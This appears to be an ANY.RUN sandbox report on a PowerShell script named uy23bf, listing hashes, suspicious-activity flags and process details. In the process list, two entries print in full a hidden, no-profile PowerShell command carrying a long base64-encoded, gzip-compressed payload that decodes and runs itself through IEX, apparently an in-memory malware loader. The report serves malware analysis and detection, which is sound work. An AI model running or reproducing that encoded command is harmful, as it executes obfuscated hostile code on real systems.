File name:

uy23bf

Full analysis: https://app.any.run/tasks/cba07ca2-2c4c-4198-978b-c2a793eccdf3
Verdict: Malicious activity
Analysis date: September 11, 2019, 12:19:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with no line terminators
MD5:

81B39BA6741B693999FB6B500EFFEBB9

SHA1:

FE99A1D5D3237D29295D975F4328D1AAC13134A7

SHA256:

5C6B10A6331548837910D23C64BBF0E49206C2C41C9B38D50027296CB5AFDDFA

SSDEEP:

96:BLPyRn5jzxeXwd0AQoDOYtVW0qNkkXsLEZVq/j3Dz5/BwIFM0IeGwhLmz2c:BbyRn5jzxeXweAQhYTbqNkkSKk/D5/Bs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3120)
      • powershell.exe (PID: 3296)
      • powershell.exe (PID: 3068)

    • Reads Internet Cache Settings

      • NOTEPAD.EXE (PID: 2664)

    • Creates files in the user directory

      • powershell.exe (PID: 3120)
      • powershell.exe (PID: 3296)
      • powershell.exe (PID: 2644)
      • powershell.exe (PID: 3068)
      • powershell.exe (PID: 3236)
      • powershell.exe (PID: 2468)

    • Application launched itself

      • powershell.exe (PID: 3120)
      • powershell.exe (PID: 3296)
      • powershell.exe (PID: 3068)

    • Executes PowerShell scripts

      • powershell.exe (PID: 3296)
      • powershell.exe (PID: 3120)
      • powershell.exe (PID: 3068)

    • Executed as Windows Service

      • PresentationFontCache.exe (PID: 2636)

  • INFO

    • Manual execution by user

      • powershell.exe (PID: 3120)
      • powershell.exe (PID: 3296)
      • powershell.exe (PID: 3068)
      • PowerShell_ISE.exe (PID: 3104)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
10
Malicious processes
0
Suspicious processes
3

Behavior graph

Click at the process to see the details
start rundll32.exe no specs notepad.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell_ise.exe presentationfontcache.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2468"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAaABRAG8AQwBiAGsAMAA5AEMAWQB6ADUAYwAzAFkASABCAEEAYQBrADQAUwBXAE0AbwB5AFEAWgBXAEoAaQBMAEoAQgBrAGcAMwBQAHQAZgA3ACsAVgBqAFMAbQA5AEoAbgBlAGQAdQBjAHMATQBFADEAbgBhAFgAZQAwACsAKwArAHkAdQBIAEMAcABMAGoAdQBRACsAawBYADMAbQBVAGwAUwA2AHAAMQB6ADQATABFAFQAbgBoAGMASgBwAGkAOQBrAFMAWABhAE0AUABXAHMARwBMAFEAaQBMAFYAdABsAHIATQBGAGwAVABPADEAcAB5AFIARwBYAFoAZABUAG8AVgBBAGYAeABaAE8AaABwAGoAagBGAGQASgBQAFkAOAB4AG4ASwArAFoARwBBAFMAMgBpADkARQBNAEoAVQBqAGYAaQAxAEQAZwA1AEsAWgB5AGsAVwAxAEUAbwBzAEUAZABuAEkAWgBaACsAVABHAGMAcgBLAGgAKwBaAEsAKwBBAGkAZgBWAEoAZgByADEAdABzAGgAZgAxAHcAKwB2ADUAOQBNACsASwBjAGgAagBMADcATABuAGUAbwByAEEAdABCAFYALwBQAEEAcAAwAEkAMwAwAEYAZgAwADgARQBnADUATABkADMATQBsADUAUgBJADkAQwBjADYAbgBaAFUANwBBAFoAdgBqAFkAQwArAFcATgBEAEYANQBoAEkARABxAG8AYQB2AE8AZQBvAHgAZwBGAFUASABaAFcAUQBlACsAMQBMAFUAdgBYAHoAUgBqAFUAagBxAGIAbAB0AHUAYgBDAEEAZABDADEANQB4AEUAUwBMAG8AcQB1ADAARwBnAEcAZQBpAGIAbwBTADQAYwBKAFcAdQBxAGEAMwAyAGYAYwBDAGEAWQBKADgAcwBQAGYAbABnADkATAA5ACsAbAAzAGcAOQBTADUALwB1AFoANwA1AHEAeABqADIAeQB4AHgAaABEAEgANgAwAEUAcQBxADUAbQBPAHIAcwBGAHkAQwBOAGoAVQBNAHcAeQAxAEkAcABxAG8AKwB5AGIAVABLAGYAcAB3ADgATwBZADIAQwBxAFcALwBvAG0AVQA3AGwASgBTAHoAdABVAE4ANQA3AEIATQBxAHkAaABZAE8AMwBZAEQAZQBVAGcALwBVAE4AQQBIAHAAQwB4AGUAYQBBAFUANQB3AEsAaQBNAGUAbwB0AHcAWAAwAEkAdgBaAEUAOQBWAFAAdwB5AGcASQBpAG0AQgAzADgAcQB0ADIAcAAvAHEAQQBiAG4ATgB3AGYAMQBWAEoAUAAxAFkAQwBxAGEASABrAFIAbgBIAFAAaQBWACsAQgBvADUALwB5AEoAagBNAEgANABmAHoAawAvAFIARwA1AEQAUABqADcAaQBXAEIARwA0AFYAdgBoAEIAYQBxADYATgBLAEEATABMAE8AbABNAEEAcgA1AEgAWABDADIAYwBuAEUAegBTAEoAWQBWADQAOQBDAEUAVABmAHEAcAAzAGoAUwBwAEYAMQBBAGMAbgBzAEcAUQA4AFUAZQBrAGMAOABZAGcAYQAwACsALwA1AHkAYQA3AE4ATgBVAFgAeABWAFUATgBuAHUAZABaAGUASgAwAHQAUAA1AHMAYwAxAG0AdAB3AHoAMwA1ADAAVwBUAG8AegBDAG4AagAxAHEAZgB6AGEAUAAvAE0AQwBsAFgASgAyAC8AWABnADAAdAA2AHYAawBoAGIAUwBVAGgAWAB2AGsAawBKADcAegArAFUAcwA2AG8ARgA5AEEAVQBqADMASQB1AE4AZwBBAC8AZABXADEALwBRAE4AMwBXAEgAaAAxAE4AQQBUAHIANQBXAGEAMgA5ADgAdQBWAEIAdAA1AEUANQBWAHkAZQBRAGQAdwBGAGUAQQBTAFcATQBIADUAMwBKAGMAcQBoAHIAZAB0AGkAbgBLADgAQQB2ACsAdwBhAGEAbgBuAHAAUQBaAGoAUwBYADMAcABkAFcAawB0ACsAdQB2AGgAVwBYAG0AdwBFAFcAbwBvAGkARwBFAGQAUQA1AEsAUwBLAEgANABvAEMANgBSAFYAUQBQAGgAYgA4AC8AcQBrAGUAUwBwAFUAdgB0AHUANwB2ADkASwBKAEEAKwB3AFUATABtADUAcQBiAEcAQwA1AEQAdQByADIANgB5AEUAQwBvAG0ASQBwAEIAZABnAEcASABrAHIAQwBuAHgAYwBhAEIAUQBLAFMATABMAGQAMgBrAGoAYwBmAHgARgA3AG8ATAAyAEkAaQBaAE4ASABBAFIAUQBjAG0AQQBwAGgAcAB6AEEAagBzAEwAQwBrAFkAbwB6ADMAQwAzACsAbgBSADkARwAyAGEASABTAFgAcQAwAEQAdQBnAEwAcAB0AEEAdQBaAEEAVgA1AEEAegA5AGwAWABWAEUAbwAzAHYASwBDAHUAOQBnADkAdQA1ADMAVwBTAEYAWQBYAEMASwBnAGYAcAB5AEcAawBnAGcAQgBNAHcAVwBVAFQAMwBQAHAAZgBRADEANwBUAGkAVAA4AFQANwBiACsANwA5ADIARwBKACsAYwBMAFAASgA2AFQANgBSAGUAbABxAEkAawAwAFkAaQBWAGIAbQBrAGsAawBRAE4AbAArAHMARABsAGkAbAB5AFgAQQBKAHEASgBtAGUAcgBCAGgAYgAwADgAcwBKAEoAMgA1AGkAdQBWAGEAKwBpAGoAWgAzADAAbAB4ADgAdgBlAGEAYwBkAG0AOQBiAEcAYQBvAC8AZwBGADgATwB2AHUAagBIAGIAdgBWADcAMwBkAHQAMgA0ADcAWgBGADIAZABEAE8AMABLAGwAMwBQAC8AbgBqAFYAdQBvAGkAMgBrAFIAMgBOAEcAcABXAHEAVwBRAEcANQA1ADAAMgBuADcAZABuAHgARABmAHQAMABGAHEAMAB1AHoAdAB5ADEASABRADkAZwBUADcAegBiAFcASwBKAGwAeAA2ADIANgBkAGIANQBoADUAdQBYAEMAcgArADMAdABaAFAAbwBmADUAOQB1AHoAKwBkAGcAMgAzADgAMAA3ADUAbwBWADEATAAwAHcAbABiADkAbAB4AHcAOQB3ADAAYQB3AHoAVwBiACsAMgA0AHkAYgBxAGcAZAAzAFcANQBEAGgAdABiADkANABLADIAdQA1AGQAMAAzAEMAUABiAHEAcgB5AGkAZQBMAEYATAAvAHIAaAAvADAANAA0AEcAMwBVADgAVgBzAGUAeABEAEQARQA3AHQAbQBYAFMAYgBnADYANQBkAGsAZQA4AGUAcQA2ADEATwBkAGYAagA1AE8AVwBGAGkAYQBTAGUARAAzADkAcgBSAE8AaQBGAFAAWQB2AG0AVQBrAEsAVwBUADMASQB5ADYAQwBjAGcAOQBQAFEAVwBPADAAOQBnADUANQA1ADkASABiADQAYwBlAHEAWQBVADMAYgBMAEIAMQB1ADMAYgBWADcARABVAHIATwA3AHAAMQBuADgALwBYADAAVwBBADgAdQBuAHQAYQBPAGcANwBJAFgAMwBLAFQAMwBkAHkARgBHADkARgBaAFgARABnAFIARwAyADkASgBEAFAAdABuAGoAdQBQAHUAWABBAGcAcwBIAGkAZQBmAHEAawBQAE0AMwBDADEANQBUAHYAZQBUAGYAZwB2AHUAUABqADQARABmAEUAaAAxADAANwBtAHkASQBLADYAdwBrAGYAVAA0AHgAaQBlAEEATwBiAEgANgBTAGUAOAB4AEcAVABxAHAAVABiAGMAZABMADgAKwA5AGQAeAA3ADQAWAAzAEgAZQBQAEoAeQB0AEwAWQB2AFUATgBpAEIALwArAFIAZwAzAEUAbwBFAHYAQQB2AEwAawAxAEcANABlAEYAdQBNAHgAcQBjAG0AZAAxAFgAZwBlADkAcwBqAGcAbQBWAFMAdAAyAHQAdgBXAHUARABaAHkAZwBrAEgASABxADkAUwBHAGQANgBZADUAKwBtAGgAdAB4ACsAYgB1ADAANABOAGQARwBWAGgAWAA0AC8ANgAxAFkAcABYAEgATwBNAHkASgBuAGUAcQA5AHYAeQBQADQAWAB3AG8AawBPAHYAQQBHADIAQQBKAEUAVgBQAHQAdgAzAGgAaQBxAGYAeAA5AE8ASgBxAGUANwBhAFQANQB2AEQAOQArAGwAKwBRADYAcwBWAFgAOQBUAEgARQB4AFAAWQBuAHoARQB2AE4AZQBHAFcAQgA5AHoAOABZAGcARABZAEMAUQBNAG8AcgB5AE4AbQBJAHkAYgArADMARQB5AFoATAA3AFMAMABQAFcAWABYADAAQgBQAGwASQBjADAAZwBOAGMAQgB2AEIALwB5ADQAcQBzAEgAQQBTAE4AcQBBAEwANAB5AGkAVwBBAGMAWgAwAE4AeQBDAGsAMwBtAEQAcABiAFYAOAB4AGQAWABCAGoAbwBJAHcAdABUAEwAWQBwAHAASABuAHAAYwBPAGkAWAAyAEUAKwBhAHoATQBCAGQAKwAvAC8AdwB6AGgARgBZADkAQQA3AE4ARgB3AEkAUgArAEwAcQBMAEsAcgBWAGkAbwBWADkAZgArAGkAWQBoAFIAKwBIAFoAWQBtAFcAeQBmADYAdwBWAHgAUgBEAGMAawBqAFQANAA1AHYAQwB0AEsAYgBqAEQAMwA2AFAAQQBwAFgAOQBIADkATQB3AEEAKwBYAC8AagB1ADAAQwByAHgAMAB6AGgANgBnAFMAeAAxADYARwBTACsAagBvAEgAMABvAEYARwB3AFAASABlADAATAAvAHgAbABlAGsAWABTAEQAcgBsAEwAdQBDAFkAbQA1AEwAQwAzAFoASABKADYAYwBhAFEALwBWAFQANwBHAEIANwBQAFkAWQBuAFcATAAwAEQAWgBVAGcAdgBMAHEAbwBuAHMATwA3AGsAeQA4AGkAMQBWAEIAUgA5AG8AegArAGkAcgBiAFkAegB4AFMALwBvAGwAdABLAEsARAB5AEQAUwBsADAAMgBCADUAWgBTAG0ASQB2AEsAZABHAHAARQBDAGMAUABlAFgAegArAHYAZABoADYAWABDAHcAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2636C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exeC:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exeservices.exe
User:
LOCAL SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
PresentationFontCache.exe
Exit code:
0
Version:
3.0.6920.4902 built by: NetFXw7
Modules
Images
c:\windows\microsoft.net\framework\v3.0\wpf\presentationfontcache.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
2644"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAaABRAG8AQwBiAGsAMAA5AEMAWQB6ADUAYwAzAFkASABCAEEAYQBrADQAUwBXAE0AbwB5AFEAWgBXAEoAaQBMAEoAQgBrAGcAMwBQAHQAZgA3ACsAVgBqAFMAbQA5AEoAbgBlAGQAdQBjAHMATQBFADEAbgBhAFgAZQAwACsAKwArAHkAdQBIAEMAcABMAGoAdQBRACsAawBYADMAbQBVAGwAUwA2AHAAMQB6ADQATABFAFQAbgBoAGMASgBwAGkAOQBrAFMAWABhAE0AUABXAHMARwBMAFEAaQBMAFYAdABsAHIATQBGAGwAVABPADEAcAB5AFIARwBYAFoAZABUAG8AVgBBAGYAeABaAE8AaABwAGoAagBGAGQASgBQAFkAOAB4AG4ASwArAFoARwBBAFMAMgBpADkARQBNAEoAVQBqAGYAaQAxAEQAZwA1AEsAWgB5AGsAVwAxAEUAbwBzAEUAZABuAEkAWgBaACsAVABHAGMAcgBLAGgAKwBaAEsAKwBBAGkAZgBWAEoAZgByADEAdABzAGgAZgAxAHcAKwB2ADUAOQBNACsASwBjAGgAagBMADcATABuAGUAbwByAEEAdABCAFYALwBQAEEAcAAwAEkAMwAwAEYAZgAwADgARQBnADUATABkADMATQBsADUAUgBJADkAQwBjADYAbgBaAFUANwBBAFoAdgBqAFkAQwArAFcATgBEAEYANQBoAEkARABxAG8AYQB2AE8AZQBvAHgAZwBGAFUASABaAFcAUQBlACsAMQBMAFUAdgBYAHoAUgBqAFUAagBxAGIAbAB0AHUAYgBDAEEAZABDADEANQB4AEUAUwBMAG8AcQB1ADAARwBnAEcAZQBpAGIAbwBTADQAYwBKAFcAdQBxAGEAMwAyAGYAYwBDAGEAWQBKADgAcwBQAGYAbABnADkATAA5ACsAbAAzAGcAOQBTADUALwB1AFoANwA1AHEAeABqADIAeQB4AHgAaABEAEgANgAwAEUAcQBxADUAbQBPAHIAcwBGAHkAQwBOAGoAVQBNAHcAeQAxAEkAcABxAG8AKwB5AGIAVABLAGYAcAB3ADgATwBZADIAQwBxAFcALwBvAG0AVQA3AGwASgBTAHoAdABVAE4ANQA3AEIATQBxAHkAaABZAE8AMwBZAEQAZQBVAGcALwBVAE4AQQBIAHAAQwB4AGUAYQBBAFUANQB3AEsAaQBNAGUAbwB0AHcAWAAwAEkAdgBaAEUAOQBWAFAAdwB5AGcASQBpAG0AQgAzADgAcQB0ADIAcAAvAHEAQQBiAG4ATgB3AGYAMQBWAEoAUAAxAFkAQwBxAGEASABrAFIAbgBIAFAAaQBWACsAQgBvADUALwB5AEoAagBNAEgANABmAHoAawAvAFIARwA1AEQAUABqADcAaQBXAEIARwA0AFYAdgBoAEIAYQBxADYATgBLAEEATABMAE8AbABNAEEAcgA1AEgAWABDADIAYwBuAEUAegBTAEoAWQBWADQAOQBDAEUAVABmAHEAcAAzAGoAUwBwAEYAMQBBAGMAbgBzAEcAUQA4AFUAZQBrAGMAOABZAGcAYQAwACsALwA1AHkAYQA3AE4ATgBVAFgAeABWAFUATgBuAHUAZABaAGUASgAwAHQAUAA1AHMAYwAxAG0AdAB3AHoAMwA1ADAAVwBUAG8AegBDAG4AagAxAHEAZgB6AGEAUAAvAE0AQwBsAFgASgAyAC8AWABnADAAdAA2AHYAawBoAGIAUwBVAGgAWAB2AGsAawBKADcAegArAFUAcwA2AG8ARgA5AEEAVQBqADMASQB1AE4AZwBBAC8AZABXADEALwBRAE4AMwBXAEgAaAAxAE4AQQBUAHIANQBXAGEAMgA5ADgAdQBWAEIAdAA1AEUANQBWAHkAZQBRAGQAdwBGAGUAQQBTAFcATQBIADUAMwBKAGMAcQBoAHIAZAB0AGkAbgBLADgAQQB2ACsAdwBhAGEAbgBuAHAAUQBaAGoAUwBYADMAcABkAFcAawB0ACsAdQB2AGgAVwBYAG0AdwBFAFcAbwBvAGkARwBFAGQAUQA1AEsAUwBLAEgANABvAEMANgBSAFYAUQBQAGgAYgA4AC8AcQBrAGUAUwBwAFUAdgB0AHUANwB2ADkASwBKAEEAKwB3AFUATABtADUAcQBiAEcAQwA1AEQAdQByADIANgB5AEUAQwBvAG0ASQBwAEIAZABnAEcASABrAHIAQwBuAHgAYwBhAEIAUQBLAFMATABMAGQAMgBrAGoAYwBmAHgARgA3AG8ATAAyAEkAaQBaAE4ASABBAFIAUQBjAG0AQQBwAGgAcAB6AEEAagBzAEwAQwBrAFkAbwB6ADMAQwAzACsAbgBSADkARwAyAGEASABTAFgAcQAwAEQAdQBnAEwAcAB0AEEAdQBaAEEAVgA1AEEAegA5AGwAWABWAEUAbwAzAHYASwBDAHUAOQBnADkAdQA1ADMAVwBTAEYAWQBYAEMASwBnAGYAcAB5AEcAawBnAGcAQgBNAHcAVwBVAFQAMwBQAHAAZgBRADEANwBUAGkAVAA4AFQANwBiACsANwA5ADIARwBKACsAYwBMAFAASgA2AFQANgBSAGUAbABxAEkAawAwAFkAaQBWAGIAbQBrAGsAawBRAE4AbAArAHMARABsAGkAbAB5AFgAQQBKAHEASgBtAGUAcgBCAGgAYgAwADgAcwBKAEoAMgA1AGkAdQBWAGEAKwBpAGoAWgAzADAAbAB4ADgAdgBlAGEAYwBkAG0AOQBiAEcAYQBvAC8AZwBGADgATwB2AHUAagBIAGIAdgBWADcAMwBkAHQAMgA0ADcAWgBGADIAZABEAE8AMABLAGwAMwBQAC8AbgBqAFYAdQBvAGkAMgBrAFIAMgBOAEcAcABXAHEAVwBRAEcANQA1ADAAMgBuADcAZABuAHgARABmAHQAMABGAHEAMAB1AHoAdAB5ADEASABRADkAZwBUADcAegBiAFcASwBKAGwAeAA2ADIANgBkAGIANQBoADUAdQBYAEMAcgArADMAdABaAFAAbwBmADUAOQB1AHoAKwBkAGcAMgAzADgAMAA3ADUAbwBWADEATAAwAHcAbABiADkAbAB4AHcAOQB3ADAAYQB3AHoAVwBiACsAMgA0AHkAYgBxAGcAZAAzAFcANQBEAGgAdABiADkANABLADIAdQA1AGQAMAAzAEMAUABiAHEAcgB5AGkAZQBMAEYATAAvAHIAaAAvADAANAA0AEcAMwBVADgAVgBzAGUAeABEAEQARQA3AHQAbQBYAFMAYgBnADYANQBkAGsAZQA4AGUAcQA2ADEATwBkAGYAagA1AE8AVwBGAGkAYQBTAGUARAAzADkAcgBSAE8AaQBGAFAAWQB2AG0AVQBrAEsAVwBUADMASQB5ADYAQwBjAGcAOQBQAFEAVwBPADAAOQBnADUANQA1ADkASABiADQAYwBlAHEAWQBVADMAYgBMAEIAMQB1ADMAYgBWADcARABVAHIATwA3AHAAMQBuADgALwBYADAAVwBBADgAdQBuAHQAYQBPAGcANwBJAFgAMwBLAFQAMwBkAHkARgBHADkARgBaAFgARABnAFIARwAyADkASgBEAFAAdABuAGoAdQBQAHUAWABBAGcAcwBIAGkAZQBmAHEAawBQAE0AMwBDADEANQBUAHYAZQBUAGYAZwB2AHUAUABqADQARABmAEUAaAAxADAANwBtAHkASQBLADYAdwBrAGYAVAA0AHgAaQBlAEEATwBiAEgANgBTAGUAOAB4AEcAVABxAHAAVABiAGMAZABMADgAKwA5AGQAeAA3ADQAWAAzAEgAZQBQAEoAeQB0AEwAWQB2AFUATgBpAEIALwArAFIAZwAzAEUAbwBFAHYAQQB2AEwAawAxAEcANABlAEYAdQBNAHgAcQBjAG0AZAAxAFgAZwBlADkAcwBqAGcAbQBWAFMAdAAyAHQAdgBXAHUARABaAHkAZwBrAEgASABxADkAUwBHAGQANgBZADUAKwBtAGgAdAB4ACsAYgB1ADAANABOAGQARwBWAGgAWAA0AC8ANgAxAFkAcABYAEgATwBNAHkASgBuAGUAcQA5AHYAeQBQADQAWAB3AG8AawBPAHYAQQBHADIAQQBKAEUAVgBQAHQAdgAzAGgAaQBxAGYAeAA5AE8ASgBxAGUANwBhAFQANQB2AEQAOQArAGwAKwBRADYAcwBWAFgAOQBUAEgARQB4AFAAWQBuAHoARQB2AE4AZQBHAFcAQgA5AHoAOABZAGcARABZAEMAUQBNAG8AcgB5AE4AbQBJAHkAYgArADMARQB5AFoATAA3AFMAMABQAFcAWABYADAAQgBQAGwASQBjADAAZwBOAGMAQgB2AEIALwB5ADQAcQBzAEgAQQBTAE4AcQBBAEwANAB5AGkAVwBBAGMAWgAwAE4AeQBDAGsAMwBtAEQAcABiAFYAOAB4AGQAWABCAGoAbwBJAHcAdABUAEwAWQBwAHAASABuAHAAYwBPAGkAWAAyAEUAKwBhAHoATQBCAGQAKwAvAC8AdwB6AGgARgBZADkAQQA3AE4ARgB3AEkAUgArAEwAcQBMAEsAcgBWAGkAbwBWADkAZgArAGkAWQBoAFIAKwBIAFoAWQBtAFcAeQBmADYAdwBWAHgAUgBEAGMAawBqAFQANAA1AHYAQwB0AEsAYgBqAEQAMwA2AFAAQQBwAFgAOQBIADkATQB3AEEAKwBYAC8AagB1ADAAQwByAHgAMAB6AGgANgBnAFMAeAAxADYARwBTACsAagBvAEgAMABvAEYARwB3AFAASABlADAATAAvAHgAbABlAGsAWABTAEQAcgBsAEwAdQBDAFkAbQA1AEwAQwAzAFoASABKADYAYwBhAFEALwBWAFQANwBHAEIANwBQAFkAWQBuAFcATAAwAEQAWgBVAGcAdgBMAHEAbwBuAHMATwA3AGsAeQA4AGkAMQBWAEIAUgA5AG8AegArAGkAcgBiAFkAegB4AFMALwBvAGwAdABLAEsARAB5AEQAUwBsADAAMgBCADUAWgBTAG0ASQB2AEsAZABHAHAARQBDAGMAUABlAFgAegArAHYAZABoADYAWABDAHcAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2664"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\uy23bfC:\Windows\system32\NOTEPAD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2768"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\uy23bfC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imagehlp.dll
3068"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3104"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe" C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell ISE
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell_ise.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3120"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\uy23bf.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
